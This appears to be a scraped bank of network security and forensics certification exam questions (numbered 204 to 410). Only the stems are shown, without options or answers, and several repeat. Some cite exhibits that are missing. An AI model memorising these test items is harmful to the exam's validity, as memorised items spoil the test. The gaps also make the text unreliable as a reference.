Peter's manager suspects that someone is trying to log in to his computer in his absence. Which of the following commands will Peter run to show the last unsuccessful login attempts, as well as the users who have last logged in to the manager's system?
Each correct answer represents a complete solution. Choose two.

Question204: Which of the following protocols uses only User Datagram Protocol (UDP)?

Question205: Which of the following log files are used to collect evidences before taking the bit-stream image of the BlackBerry?
Each correct answer represents a complete solution. Choose all that apply.

Question206: You work as a Network Administrator for Net Perfect Inc. The company has a TCP/IP-based network. You are configuring an Internet connection on a server. Which of the following servers filters outbound Web traffic on the network?

Question207: Which of the following commands will you use with the tcpdump command to capture the traffic from a filter stored in a file?

Question208: Routers work at which layer of the OSI reference model?

Question209: Which of the following is included in a memory dump file?

Question210: Which of the following techniques is used to log network traffic?

Question211: DRAG DROP
Drag and drop the appropriate protocols to their respective port numbers they use by default.
Select and Place:

Question212: What is the easiest way to verify that name resolution is functioning properly on a TCP/IP network?

Question213: You work as a Network Administrator for NetTech Inc. You want to know the local IP address, subnet mask, and default gateway of a NIC in a Windows 98 computer. Which of the following utilities will you use to accomplish this ?

Question214: You work as a Network Administrator for PassGuide Inc. The company has deployed an ASA at the network perimeter. Which of the following types of firewall will you use to create two different communications, one between the client and the firewall, and the other between the firewall and the end server?

Question215: Which of the following honeypots is a low-interaction honeypot and is used by companies or corporations for capturing limited information about malicious hackers?

Question216: Which of the following programs can be used to detect stealth port scans performed by a malicious hacker?
Each correct answer represents a complete solution. Choose all that apply.

Question217: Which of the following protocols is used by TFTP as a file transfer protocol?

Question218: Which of the following tools performs comprehensive tests against web servers for multiple items, including over 6100 potentially dangerous files/CGIs?

Question219: Which of the following algorithms is used as a default algorithm for ESP extension header in IPv6?

Question220: Peter, a malicious hacker, wants to perform an attack. He first compromises computers distributed across the internet and then installs specialized software on these computers. He then instructs the compromised hosts to execute the attack. Every host can then be used to launch its own attack on the target computers.
Which of the following attacks is Peter performing?

Question221: Which of the following ports is the default port for IMAP4 protocol?

Question222: Which of the following tools is an open source protocol analyzer that can capture traffic in real time?

Question223: Which of the following determines which protocols can be used by clients to access the Internet in an ISA Server enabled network?

Question224: Nathan works as a Computer Hacking Forensic Investigator for SecureEnet Inc. He uses Visual TimeAnalyzer software to track all computer usage by logging into individual users account or specific projects and compile detailed accounts of time spent within each program. Which of the following functions are NOT performed by Visual TimeAnalyzer?
Each correct answer represents a complete solution. Choose all that apply.

Question225: Which of the following password cracking attacks is based on a pre-calculated hash table to retrieve plain text passwords?

Question226: Which of the following is used for remote file access by UNIX/Linux systems?

Question227: Mark works as a Network administrator for SecureEnet Inc. His system runs on Mac OS X.
He wants to boot his system from the Network Interface Controller (NIC). Which of the following snag keys will Mark use to perform the required function?

Question228: Which of the following ICMP types refers to the message "Time Exceeded"?

Question229: Which of the following statements is true about ICMP packets?
Each correct answer represents a complete solution. Choose all that apply.

Question230: You work as a Network Administrator for Tech Perfect Inc. The office network is configured as an IPv6 network. You have to configure a computer with the IPv6 address, which is equivalent to an IPv4 publicly routable address. Which of the following types of addresses will you choose?

Question231: You are a professional Computer Hacking forensic investigator. You have been called to collect the evidences of Buffer Overflows or Cookie snooping attack. Which of the following logs will you review to accomplish the task?
Each correct answer represents a complete solution. Choose all that apply.

Question232: Which of the following ports is used by e-mail clients to send request to connect to the server?

Question233: Which of the following commands is used to verify the hash value in Netcat?

Question234: Which of the following limits the number of packets seen by tcpdump?

Question235: Which of the following is true for XSS, SQL injection, and RFI?

Question236: Which of the following is used as a default port by the TELNET utility?

Question237: Which of the following fields of the IPv6 header is similar to the TTL field of IPv4?

Question238: Mark works as a Network Administrator for Infonet Inc. The company has a Windows 2000 domainbased network. Mark wants to block all NNTP traffic between the network and the Internet. How will he configure the network?

Question239: Windump is a Windows port of the famous TCPDump packet sniffer available on a variety of platforms. In order to use this tool on the Windows platform a user must install a packet capture library.
What is the name of this library?

Question240: Adam works as a professional Computer Hacking Forensic Investigator. A project has been assigned to him to investigate a multimedia enabled mobile phone, which is suspected to be used in a cyber crime.
Adam uses a tool, with the help of which he can recover deleted text messages, photos, and call logs of the mobile phone. Which of the following tools is Adam using?

Question241: You work as a Network Administrator for Net Perfect Inc. The company has a TCP/IP-based network. The network is connected to the Internet through a firewall. A user complains that he is unable to access the abc.com site. However, he can access all other sites. Which of the following tools will help you diagnose the problem?

Question242: You work as a Network Administrator for Net Perfect Inc. The company has a Windows Server
2008 network environment. The servers on the network run Windows Server 2008 R2. All client computers on the network run Windows 7 Ultimate. You have configured DirectAccess feature on the laptop of few sales managers so that they can access corporate network from remote locations. Their laptops run Windows 7 Ultimate. Which of the following options does the DirectAccess use to keep data safer while traveling through travels public networks?

Question243: Allen works as a professional Computer Hacking Forensic Investigator. A project has been assigned to him to investigate a computer, which is used by the suspect to sexually harass the victim using instant messenger program. Suspect's computer runs on Windows operating system. Allen wants to recover password from instant messenger program, which suspect is using, to collect the evidence of the crime.
Allen is using Helix Live for this purpose. Which of the following utilities of Helix will he use to accomplish the task?

Question244: You work as a professional Computer Hacking Forensic Investigator. A project has been assigned to you to investigate Plagiarism occurred in the source code files of C#. Which of the following tools will you use to detect the software plagiarism?

Question245: Which of the following firewalls operates at three layers- Layer3, Layer4, and Layer5?

Question246: Which of the following processes is used to convert plain text into cipher text?

Question247: Which of the following is a checksum algorithm?

Question248: Adam works as a professional Computer Hacking Forensic Investigator. He has been called by the FBI to examine data of the hard disk, which is seized from the house of a suspected terrorist.
Adam decided to acquire an image of the suspected hard drive. He uses a forensic hardware tool, which is capable of capturing data from IDE, Serial ATA, SCSI devices, and flash cards. This tool can also produce MD5 and CRC32 hash while capturing the data. Which of the following tools is Adam using?

Question249: Which of the following techniques is used to identify attacks originating from a botnet?

Question250: Every network device contains a unique built in Media Access Control (MAC) address, which is used to identify the authentic device to limit the network access. Which of the following addresses is a valid MAC address?

Question251: Which of the following is the default port for POP3?

Question252: Which of the following is an asymmetric encryption algorithm?

Question253: You work as a technician for Tech Perfect Inc. You are troubleshooting an Internet name resolution issue.
You ping your ISP's DNS server address and find that the server is down. You want to continuously ping the DNS address until you have stopped the command. Which of the following commands will you use?

Question254: Which of the following DoS attacks points the Central Processing Unit (CPU) to a non-existent memory location causing the running process to end abruptly?

Question255: Which of the following tools in Helix Windows Live is used to reveal the database password of password protected MDB files created using Microsoft Access or with Jet Database Engine?

Question256: Andrew works as a Forensic Investigator for PassGuide Inc. The company has a Windows-based environment. The company's employees use Microsoft Outlook Express as their e-mail client program. E- mails of some employees have been deleted due to a virus attack on the network.
Andrew is therefore assigned the task to recover the deleted mails. Which of the following tools can Andrew use to accomplish the task?
Each correct answer represents a complete solution. Choose two.

Question257: Adam works as a Computer Hacking Forensic Investigator in a law firm. He has been assigned with his first project. Adam collected all required evidences and clues. He is now required to write an investigative report to present before court for further prosecution of the case. He needs guidelines to write an investigative report for expressing an opinion. Which of the following are the guidelines to write an investigative report in an efficient way?
Each correct answer represents a complete solution. Choose all that apply.

Question258: Where is the Hypertext Transfer Protocol (HTTP) used?

Question259: Which of the following networks relies on the tunneling protocol?

Question260: Nathan works as a professional Ethical Hacker. He wants to see all open TCP/IP and UDP ports of his computer. Nathan uses the netstat command for this purpose but he is still unable to map open ports to the running process with PID, process name, and path. Which of the following commands will Nathan use to accomplish the task?

Question261: For a host to have successful Internet communication, which of the following network protocols are required? You should assume that the users will not manually configure the computer in anyway and that the measure of success will be whether the user can access Web sites after powering the computer and logging on.
Each correct answer represents a complete solution. Choose all that apply.

Question262: Which of the following port numbers are valid ephemeral port numbers?
Each correct answer represents a complete solution. Choose two.

Question263: Which of the following firewalls keeps track of the state of network connections traveling across the network?

Question264: Which of the following tools is a wireless sniffer and analyzer that works on the Windows operating system?

Question265: SIMULATION
Fill in the blank with the appropriate facts regarding IP version 6 (IPv6).
IP addressing version 6 uses_____ -bit address. Its____ IP address assigned to a single host allows the host to send and receive data.

Question266: Which of the following is an example of a social engineering attack?

Question267: At which port does a DHCPv6 client listen for DHCP messages?

Question268: Which of the following is an example of penetration testing?

Question269: John, a novice web user, makes a new E-mail account and keeps his password as "apple", his favorite fruit. John's password is vulnerable to which of the following password cracking attacks?
Each correct answer represents a complete solution. Choose all that apply.

Question270: You are responsible for security at a company that specializes in e-commerce. You realize that given the high volume of Web traffic, there is a significant chance of someone being able to breach your perimeter.
You want to make sure that should this occur, you can redirect the attacker away from sensitive data. How would you best accomplish this?

Question271: Which of the following are the two sub-layers present in Data Link layer of the OSI Reference model?

Question272: Which of the following ports is used by Layer 2 Tunneling Protocol (L2TP)?

Question273: Which of the following tools is an open source network intrusion prevention and detection system that operates as a network sniffer?

Question274: Adam works as a professional Computer Hacking Forensic Investigator. A project has been assigned to him to investigate a multimedia enabled mobile phone, which is suspected to be used in a cyber crime.
Adam uses a tool, with the help of which he can recover deleted text messages, photos, and call logs of the mobile phone. Which of the following tools is Adam using?

Question275: Which of the following is the default port for Simple Network Management Protocol (SNMP)?

Question276: Adam works as a professional Computer Hacking Forensic Investigator. He has been assigned with the project of investigating an iPod, which is suspected to contain some explicit material. Adam wants to connect the compromised iPod to his system, which is running on Windows XP (SP2) operating system.
He doubts that connecting the iPod with his computer may change some evidences and settings in the iPod. He wants to set the iPod to read-only mode. This can be done by changing the registry key within the Windows XP (SP2) operating system. Which of the following registry keys will Adam change to accomplish the task?

Question277: This tool is known as __________.

Question278: Which of the following is the primary TCP/IP protocol used to transfer text and binary files over the Internet?

Question279: Which of the following Linux file systems is a journaled file system?

Question280: How many bits does IPv6 use in IP addresses?

Question281: What is the name of the first computer virus that infected the boot sector of the MS-DOS operating system?

Question282: HOTSPOT
Steve works as a Network Administrator for Blue Tech Inc. All client computers in the company run the Windows Vista operating system. He often travels long distances on official duty. While traveling, he connects to the office server through his laptop by using remote desktop connection.
He wants to run an application that is available on the server of the company. When he connects to the server, he gets a message that the connection is blocked by the firewall. He returns to his office to resolve the issue. He opens the Windows Firewall Settings dialog box. What actions should he perform in the dialog box given below to accomplish the task?
Hot Area:

Question283: Which of the following is the default port for DNS zone transfer?

Question284: John works as a Security Administrator for NetPerfect Inc. The company uses Windows-based systems. A project has been assigned to John to track malicious hackers and to strengthen the company's security system. John configures a computer system to trick malicious hackers into thinking that it is the company's main server, which in fact is a decoy system to track hackers.
Which system is John using to track the malicious hackers?

Question285: Which of the following are the two sub-layers present in Data Link layer of the OSI Reference model?

Question286: Allen works as a professional Computer Hacking Forensic Investigator. A project has been assigned to him to investigate a computer, which is used by the suspect to sexually harass the victim using instant messenger program. Suspect's computer runs on Windows operating system. Allen wants to recover password from instant messenger program, which suspect is using, to collect the evidence of the crime.
Allen is using Helix Live for this purpose. Which of the following utilities of Helix will he use to accomplish the task?

Question287: Which of the following ports is used for DNS services?

Question288: Which of the following statements are true about an IPv6 network?
Each correct answer represents a complete solution. Choose all that apply.

Question289: Peter works as a Computer Hacking Forensic Investigator. He has been called by an organization to conduct a seminar to give necessary information related to sexual harassment within the work place. Peter started with the definition and types of sexual harassment. He then wants to convey that it is important that records of the sexual harassment incidents should be maintained, which helps in further legal prosecution.
Which of the following data should be recorded in this documentation?
Each correct answer represents a complete solution. Choose all that apply.

Question290: Which of the following IP packet elements is responsible for authentication while using IPSec?

Question291: SIMULATION
Fill in the blank with the appropriate term.
___________ is a technique used to make sure that incoming packets are actually from the networks that they claim to be from.

Question292: Which of the following tools is used to detect wireless LANs using the 802.11b, 802.11a, and 802.11g WLAN standards on the Windows platform?

Question293: John works as a professional Ethical Hacker. He has been assigned the project of testing the security of www.we-are-secure.com. He has written the following snort signature:

Which of the following statements about this snort signature is true?

Question294: Victor works as a network administrator for DataSecu Inc. He uses a dual firewall Demilitarized Zone (DMZ) to insulate the rest of the network from the portions that is available to the Internet.
Which of the following security threats may occur if DMZ protocol attacks are performed?
Each correct answer represents a complete solution. Choose all that apply.

Question295: Which of the following are the types of intrusion detection systems?
Each correct answer represents a complete solution. Choose all that apply.

Question296: Adam works as a Computer Hacking Forensic Investigator in a law firm. He has been assigned with his first project. Adam collected all required evidences and clues. He is now required to write an investigative report to present before court for further prosecution of the case. He needs guidelines to write an investigative report for expressing an opinion. Which of the following are the guidelines to write an investigative report in an efficient way?
Each correct answer represents a complete solution. Choose all that apply.

Question297: Sniffer operates at which layer of the OSI reference model?

Question298: SIMULATION
Fill in the blank with the appropriate term.
___________ is the practice of monitoring and potentially restricting the flow of information outbound from one network to another.

Question299: Adam works as a Network Administrator for passguide Inc. He wants to prevent the network from DOS attacks. Which of the following is most useful against DOS attacks?

Question300: Which of the following IPv6 address types is a single address that can be assigned to multiple interfaces?

Question301: You work as a Network Administrator for Rick International. The company has a TCP/IP-based network. A user named Kevin wants to set an SSH terminal at home to connect to the company's network. You have to configure your company's router for it. By default, which of the following standard ports does the SSH protocol use for connection?

Question302: Which of the following components are usually found in an Intrusion detection system (IDS)?
Each correct answer represents a complete solution. Choose two.

Question303: What is the name of the first computer virus that infected the boot sector of the MS-DOS operating system?

Question304: Which of the following are the two sub-layers present in Data Link layer of the OSI Reference model?

Question305: Which of the following is the correct order of loading system files into the main memory of the system, when the computer is running on Microsoft's Windows XP operating system?

Question306: Which of the following is computed from an arbitrary block of digital data for the purpose of detecting accidental errors?

Question307: Victor wants to use Wireless Zero Configuration (WZC) to establish a wireless network connection using his computer running on Windows XP operating system. Which of the following are the most likely threats to his computer?
Each correct answer represents a complete solution. Choose two.

Question308: You work as a Network Administrator for SmartCert Inc. The company's network contains five Windows
2003 servers and ninety Windows XP Professional client computers. You want to view all the incoming requests to an Internet Information Services (IIS) server and allow only requests that comply with a rule set, created by you, to be processed. You also want to detect the intrusion attempts by recognizing the strange characters in a URL on a Web server. What will you do to accomplish the task?

Question309: John works as a professional Ethical Hacker. He has been assigned a project for testing the security of www.we-are-secure.com. He scans the We-are-secure server and gets the following result:
sysDescr.0 = STRING. "SunOS we-are-secure.com 4.1.3_U1 1 sun4m"
sysObjectID.0 = OID. enterprises.hp.nm.hpsystem.10.1.1
sysUpTime.0 = Timeticks: (156474552) 18 days, 12:00:09
sysContact.0 = STRING. ""
sysName.0 = STRING. "we-are-secure.com"
sysLocation.0 = STRING. ""
sysServices.0 = INTEGER: 6
Which of the following tools is John using to perform the scan?

Question310: Victor works as a professional Ethical Hacker for SecureNet Inc. He wants to use Steganographic file system method to encrypt and hide some secret information. Which of the following disk spaces will he use to store this secret information?
Each correct answer represents a complete solution. Choose all that apply.

Question311: Which of the following techniques allows probing firewall rule-sets and finding entry points into the targeted system or network?

Question312: You work as a Network Administrator for McRobert Inc. Your company has a TCP/IP-based network. You have configured a WAN link for the network. You are facing connectivity problem across the WAN link.
What will be your first step in troubleshooting the issue?

Question313: Which of the following methods is a behavior-based IDS detection method?

Question314: Which of the following NETSH commands for interface Internet protocol version 4 (IPv4) is used to add a DNS server to a list of DNS servers for a specified interface?

Question315: Which of the following is a correct sequence of different layers of Open System Interconnection (OSI) model?

Question316: Which of the following switches is used with Pslist command on the command line to show the statistics for all active threads on the system, grouping these threads with their owning process?

Question317: Which of the following is the default port for Simple Network Management Protocol (SNMP)?

Question318: Which of the following protocols does IPsec use to perform various security functions in the network?
Each correct answer represents a complete solution. Choose all that apply.

Question319: Which of the following intrusion detection systems (IDS) monitors network traffic and compares it against an established baseline?

Question320: You work as a Network Administrator for Infonet Inc. The company has a Windows Server 2008 domain- based network. The network has three Windows Server 2008 member servers and 150 Windows Vista client computers. The network contains a Windows Server 2008 Core computer. You want to install the DNS server role on the Windows Server 2008 Core computer. Which of the following commands will you use to accomplish the task?

Question321: Adam works as a professional Computer Hacking Forensic Investigator. A project has been assigned to him to investigate computer of an unfaithful employee of SecureEnet Inc. Suspect's computer runs on Windows operating system. Which of the following sources will Adam investigate on a Windows host to collect the electronic evidences?
Each correct answer represents a complete solution. Choose all that apply.

Question322: Which of the following can be configured so that when an alarm is activated, all doors lock and the suspect or intruder is caught between the doors in the dead-space?

Question323: Which of the following commands in MQC tool matches IPv4 and IPv6 packets when IP parameter is missing?

Question324: You work as a Network Security Analyzer. You got a suspicious email while working on a forensic project.
Now, you want to know the IP address of the sender so that you can analyze various information such as the actual location, domain information, operating system being used, contact information, etc. of the email sender with the help of various tools and resources. You also want to check whether this email is fake or real. You know that analysis of email headers is a good starting point in such cases. The email header of the suspicious email is given below:

What is the IP address of the sender of this email?

Question325: Which of the following utilities produces the output shown in the image below?

Question326: Which of the following is a form of cheating or copying someone else's work or idea without acknowledging the source?

Question327: Which of the following commands displays the IPX routing table entries?

Question328: Which of the following proxy servers can be used for spamming?

Question329: You work as a Desktop Support Technician for umbrella Inc. The company uses a Windows-based network. An employee from the sales department is facing problem in the IP configuration of the network connection. He called you to resolve the issue. You suspect that the IP configuration is not configured properly. You want to use the ping command to ensure that IPv4 protocol is working on a computer. While running the ping command from the command prompt, you find that Windows Firewall is blocking the ping command. What is the cause of the issue?

Question330: Which of the following terms is used to represent IPv6 addresses?

Question331: Which of the following attacks involves multiple compromised systems to attack a single target?

Question332: Which of the following is the process of categorizing attack alerts produced from IDS?

Question333: Which of the following are open-source vulnerability scanners?

Question334: Which of the following statements is NOT true about FAT16 file system?
Each correct answer represents a complete solution. Choose all that apply.

Question335: Which of the following is used to provide a protective shield for the data passing over the Internet?

Question336: You are the Administrator for a Windows 2000 based network that uses DHCP to dynamically assign IP addresses to the clients and DNS servers. You want to ensure that the DNS servers can communicate with another DNS server. Which type of query will you run to achieve this?

Question337: Which of the following Windows XP system files handles memory management, I/O operations, and interrupts?

Question338: Which of the following utilities provides an efficient way to give specific users permission to use specific system commands at the root level of a Linux operating system?

Question339: John works as a Professional Ethical Hacker for NetPerfect Inc. The company has a Linux-based network.
All client computers are running on Red Hat 7.0 Linux. The Sales Manager of the company complains to John that his system contains an unknown package named as tar.gz and his documents are exploited. To resolve the problem, John uses a Port scanner to enquire about the open ports and finds out that the HTTP server service port on 27374 is open. He suspects that the other computers on the network are also facing the same problem. John discovers that a malicious application is using the synscan tool to randomly generate IP addresses. Which of the following worms has attacked the computer?

Question340: Adam, a novice Web user is getting large amount of unsolicited commercial emails on his email address.
He suspects that the emails he is receiving are the Spam. Which of the following steps will he take to stop the Spam?
Each correct answer represents a complete solution. Choose all that apply.

Question341: What are the advantages of stateless autoconfigration in IPv6?
Each correct answer represents a part of the solution. Choose three.

Question342: What is the function of TRACERT utility?

Question343: Mark works as a Network Security Administrator for BlueWells Inc. The company has a Windowsbased network. Mark is giving a presentation on Network security threats to the newly recruited employees of the company. His presentation is about the External threats that the company recently faced in the past. Which of the following statements are true about external threats?
Each correct answer represents a complete solution. Choose three.

Question344: Which of the following ports is used by e-mail clients to send request to connect to the server?

Question345: Which of the following utilities is used to display the current TCP/IP configuration of a Windows NT computer?

Question346: Which of the following cryptographic methods are used in EnCase to ensure the integrity of the data, which is acquired for the investigation?
Each correct answer represents a complete solution. Choose two.

Question347: Victor works as a professional Ethical Hacker for SecureEnet Inc. He wants to scan the wireless network of the company. He uses a tool that is a free open-source utility for network exploration.
The tool uses raw IP packets to determine the following:
What ports are open on our network systems.
What hosts are available on the network.
Identify unauthorized wireless access points.
What services (application name and version) those hosts are offering.
What operating systems (and OS versions) they are running.
What type of packet filters/firewalls are in use.
Which of the following tools is Victor using?

Question348: Which of the following Web attacks is performed by manipulating codes of programming languages such as SQL, Perl, Java present in the Web pages?

Question349: Adam, a malicious hacker purposely sends fragmented ICMP packets to a remote target. The total size of this ICMP packet once reconstructed is over 65,536 bytes.
On the basis of above information, which of the following types of attack is Adam attempting to perform?

Question350: Which of the following password cracking tools can work on the Unix and Linux environment?

Question351: You work as a Network Administrator for Tech Perfect Inc. The company has a TCP/IP-based network.
You have configured a firewall on the network. A filter has been applied to block all the ports. You want to enable sending and receiving of emails on the network. Which of the following ports will you open?
Each correct answer represents a complete solution. Choose two.

Question352: Which of the following techniques allows the existence of both the Ipv6 and Ipv4 protocols in a device or network?

Question353: Which of the following statements are true about UDP?
Each correct answer represents a complete solution. Choose all that apply.

Question354: You work as a Network Administrator for Infonet Inc. The company has a Windows Server 2008 domainbased network. The network has three Windows Server 2008 member servers and 150 Windows Vista client computers. According to the company's security policy, you apply Windows firewall setting to the computers on the network. Now, you are troubleshooting a connectivity problem that might be caused by Windows firewall. What will you do to identify connections that Windows firewall allows or blocks?

Question355: Smith works as a Network Administrator for HCP Inc. He sets up a DNS server on the network and enables DNS service on all computers. However, DNS is not working properly. Which of the following commands should Smith use to verify the DNS configuration?

Question356: You work as a Network Administrator for Tech Perfect Inc. The company has a TCP/IP-based network. A firewall has been configured on the network. You configure a filter on the router. You verify that SMTP operations have stopped after the recent configuration. Which of the following ports will you have to open on the router to resolve the issue?

Question357: Which of the following programs is used to add words to spam e-mails so that the e-mail is not considered spam and therefore is delivered as if it were a normal message?

Question358: Which of the following ports can be used for IP spoofing?

Question359: You work as a Network Administrator for Tech Perfect Inc. Your company has a Windows 2000- based network. You want to verify the connectivity of a host in the network. Which of the following utilities will you use?

Question360: John works as a professional Ethical Hacker for SecureEnet Inc. The company has a Windowsbased network. All client computers run on Windows XP. A project has been assigned to John to investigate about the open ports responsible for various malicious attacks on the network. John wants to use the DOS command-line utility to find out the open ports. Which of the following DOS commands will John use to accomplish the task?

Question361: Which of the following best describes the term protocol?

Question362: Which of the following partitions contains the system files that are used to start the operating system?

Question363: You are implementing a host based intrusion detection system on your web server. You feel that the best way to monitor the web server is to find your baseline of activity (connections, traffic, etc.) and to monitor for conditions above that baseline. This type of IDS is called __________.

Question364: You work as a Network Administrator for Net Perfect Inc. The company has a TCP/IP-based network. You are configuring an Internet connection on a server. Which of the following servers filters outbound Web traffic on the network?

Question365: What are the limitations of the POP3 protocol?
Each correct answer represents a complete solution. Choose three.

Question366: Ryan, a malicious hacker submits Cross-Site Scripting (XSS) exploit code to the Website of Internet forum for online discussion. When a user visits the infected Web page, code gets automatically executed and Ryan can easily perform acts like account hijacking, history theft etc. Which of the following types of Cross- Site Scripting attack Ryan intends to do?

Question367: You work as a Network Administrator for Infonet Inc. The company has a Windows Server 2008 Active Directory-based single forest multiple domain IPv4 network. All the DNS servers on the network run Windows Server 2008. The users in the network use NetBIOS name to connect network application on the network. You have migrated the network to IPv6-enabled network. Now you want to enable DNS Server to perform lookups in GlobalNames Zone. Which of the following commands will you use to accomplish the task?

Question368: Which of the following tools is described below?
It is a set of tools that are used for sniffing passwords, e-mail, and HTTP traffic. Some of its tools include arpredirect, macof, tcpkill, tcpnice, filesnarf, and mailsnarf. It is highly effective for sniffing both switched and shared networks. It uses the arpredirect and macof tools for switching across switched networks. It can also be used to capture authentication information for FTP, telnet, SMTP, HTTP, POP, NNTP, IMAP, etc.

Question369: Adam works as a Security Analyst for Umbrella Inc. He is performing real-time traffic analysis on IP networks using Snort. Adam is facing problems in analyzing intrusion data. Which of the following software combined with Snort can Adam use to get a visual representation of intrusion data?
Each correct answer represents a complete solution. Choose all that apply.

Question370: You work as a network administrator for Tech Perfect Inc. Rick, your assistant, requires information regarding his computer's IP address lease start date and expiry date. Which of the following commands will help him?

Question371: Which of the following statements about Secure Shell (SSH) are true?
Each correct answer represents a complete solution. Choose three.

Question372: You are using the TRACERT utility to trace the route to passguide.com. You receive the following output:
Which of the following conclusions can you draw from viewing the output?
Each correct answer represents a complete solution. Choose two.

Question373: You work as a Network Administrator for Tech Perfect Inc. The office network is configured as an IPv6 network. You have to configure a computer with the IPv6 address, which is equivalent to an IPv4 publicly routable address. Which of the following types of addresses will you choose?

Question374: You work as a Network Administrator for NetTech Inc. The company has a Windows Server 2008 domain- based network. The network contains Windows Server 2008 based two-node Network Load Balancing (NLB) cluster named Info.nettech.com. The cluster is implemented for high availability and load balancing for the company's intranet Web site. You find that the users can see the Network Load Balancing (NLB) cluster on the network neighborhood. The users are able to connect to various services by using the Info.nettech.com. The cluster is configured with the one port rule that equally balances all TCP/IP traffic across the cluster nodes. You want to configure the cluster to accept only HTTP traffic. What will you do to accomplish the task?
Each correct answer represents a part of the solution. Choose two.

Question375: Which of the following is not a function of the Snort utility?

Question376: Which of the following is the purpose of creating a Demilitarized zone (DMZ) in an enterprise network?

Question377: Which of the following tools are used to determine the hop counts of an IP packet?
Each correct answer represents a complete solution. Choose two.

Question378: What are the advantages of an application layer firewall?
Each correct answer represents a complete solution. Choose all that apply.

Question379: In the DNS Zone transfer enumeration, an attacker attempts to retrieve a copy of the entire zone file for a domain from a DNS server. The information provided by the DNS zone can help an attacker gather user names, passwords, and other valuable information. To attempt a zone transfer, an attacker must be connected to a DNS server that is the authoritative server for that zone. Besides this, an attacker can launch a Denial of Service attack against the zone's DNS servers by flooding them with a lot of requests.
Which of the following tools can an attacker use to perform a DNS zone transfer?
Each correct answer represents a complete solution. Choose all that apply.

Question380: You work as a Network Administrator for Net Perfect Inc. The company has a Windows Server 2008- based network. You have created a test domain for testing IPv6 addressing. Which of the following types of addresses are supported by IPv6?
Each correct answer represents a complete solution. Choose all that apply.

Question381: You work as a Network Administrator for Infonet Inc. The company has a Windows Server 2008 domain- based network. The network has three Windows Server 2008 member servers and 150 Windows Vista client computers. The network contains a Windows Server 2008 Core computer.
You want to install the DNS server role on the Windows Server 2008 Core computer. Which of the following commands will you use to accomplish the task?

Question382: You work as a Network Security Administrator for NetPerfect Inc. The company has a Windowsbased network. You are incharge of the data and network security of the company. While performing a threat log analysis, you observe that one of the database administrators is pilfering confidential data. What type of threat is this?

Question383: You work as a Desktop Support Technician for umbrella Inc. The company uses a Windows-based network. An employee of the production department is facing the problem in the IP configuration of the network connection.
He called you to resolve the issue. You suspect that the IP configuration is not configured properly. You want to use the ping command to ensure that IPv4 protocol is working on a computer. While running the ping command from the command prompt, you find that Windows Firewall is blocking the ping command.
You enter the following command in the elevated command prompt on the computer:
netsh advfirewall firewall add rule name="ICMPv4" protocol=icmpv4:any,any dir=in action=allow Which of the following actions will this command perform?

Question384: John works as a professional Ethical Hacker. He has been assigned a project for testing the security of www.we-are-secure.com. He wants to corrupt an IDS signature database so that performing attacks on the server is made easy and he can observe the flaws in the We-are-secure server. To perform his task, he first of all sends a virus that continuously changes its signature to avoid detection from IDS. Since the new signature of the virus does not match the old signature, which is entered in the IDS signature database, IDS becomes unable to point out the malicious virus. Which of the following IDS evasion attacks is John performing?

Question385: Which of the following files records all driver installations after the system has booted?

Question386: Which of the following types of attacks uses ICMP to consume bandwidth and crash sites?

Question387: You work as a Network Administrator for Net Perfect Inc. The company's network is configured with Internet Security and Acceleration (ISA) Server 2000 to provide firewall services. You want to block all e- mails coming from the domain named fun4you.com. How will you accomplish this?

Question388: You work as a Network Administrator for TechPerfect Inc. The company has a corporate intranet setup. A router is configured on your network to connect outside hosts to the internetworking. For security, you want to prevent outside hosts from pinging to the hosts on the internetwork. Which of the following steps will you take to accomplish the task?

Question389: Which of the following methods is used by forensic investigators to acquire an image over the network in a secure manner?

Question390: John works as a professional Ethical Hacker. He has been assigned the project of testing the security of www.we-are-secure.com. He is using a tool to crack the wireless encryption keys. The description of the tool is as follows:

Which of the following tools is John using to crack the wireless encryption keys?

Question391: Which of the following file systems supports the hot fixing feature?

Question392: Which of the following methods is used by forensic investigators to acquire an image over the network in a secure manner?

Question393: Which of the following configuration schemes in IPv6 allows a client to automatically configure its own IP address with or without IPv6 routers?

Question394: Peter works as a professional Computer Hacking Forensic Investigator for eLaw-Suit law firm. He is working on a case of a cyber crime. Peter knows that the good investigative report should not only communicate the relevant facts, but also present expert opinion. This report should not include the cases in which the expert acted as a lay witness. Which of the following type of witnesses is a lay witness?

Question395: What is the process of detecting unauthorized access known as?

Question396: You work as a Network Administrator for McNeil Inc. The company's Windows 2000-based network is configured with Internet Security and Acceleration (ISA) Server 2000. You configure intrusion detection on the server. Which of the following alerts notifies that repeated attempts to a destination computer are being made and no corresponding ACK (acknowledge) packet is being communicated?

Question397: An attacker makes an attempt against a Web server. The result is that the attack takes the form of URLs.
These URLs search for a certain string that identifies an attack against the Web server.
Which IDS/IPS detection method do the URLs use to detect and prevent an attack?

Question398: Which of the following TCP/UDP port is used by the toolkit program netstat?

Question399: Which of the following proxy servers is placed anonymously between the client and remote server and handles all of the traffic from the client?

Question400: Mark works as the Network Administrator of a Windows 2000 based network. The network has a DNS server installed. He experiences host name resolution problems on the network. In order to rectify the situation, he wants to troubleshoot DNS name resolution problems on the network.
Which of the following tools will he use to do this?

Question401: You work as a Network Administrator for McRobert Inc. Your company has a TCP/IP-based network. You want to get the protocol statistics and the active TCP/IP network connections of your computer. Which of the following will you use?

Question402: Which of the following is the unspecified address in IPv6?

Question403: You work as a Network Administrator in a company. The NIDS is implemented on the network.
You want to monitor network traffic. Which of the following modes will you configure on the network interface card to accomplish the task?

Question404: Adam works on a Linux system. He is using Sendmail as the primary application to transmit e-mails.
Linux uses Syslog to maintain logs of what has occurred on the system. Which of the following log files contains e-mail information such as source and destination IP addresses, date and time stamps etc?

Question405: Ben works as a Network Administrator in Business Software Solutions Ltd. The company uses a Windowsbased operating system throughout its network. Ben finds the following mail exchange record on the server:
max1.passguide.com. IN A 613.0.2.1
IN AAAA 4ffe:d00:1:1::88
Which of the following conclusions can Ben derive from this record?

Question406: Which of the following malicious programs changes its signature continuously to be invisible to IDS?

Question407: Which of the following would allow you to automatically close connections or restart a server or service when a DoS attack is detected?

Question408: Which of the following protocols is used by e-mail servers to send messages?

Question409: Which of the following user authentications are supported by the SSH-1 protocol but not by the SSH-2 protocol?
Each correct answer represents a complete solution. Choose all that apply.

Question410: Maria works as a professional Ethical Hacker. She is assigned a project to test the security of www.we- are-secure.com. She wants to test a DoS attack on the We-are-secure server. She finds that the firewall of the server is blocking the ICMP messages, but it is not checking the UDP packets. Therefore, she sends a large amount of UDP echo request traffic to the IP broadcast addresses. These UDP requests have a spoofed source address of the We-are-secure server.
Which of the following DoS attacks is Maria using to accomplish her task?

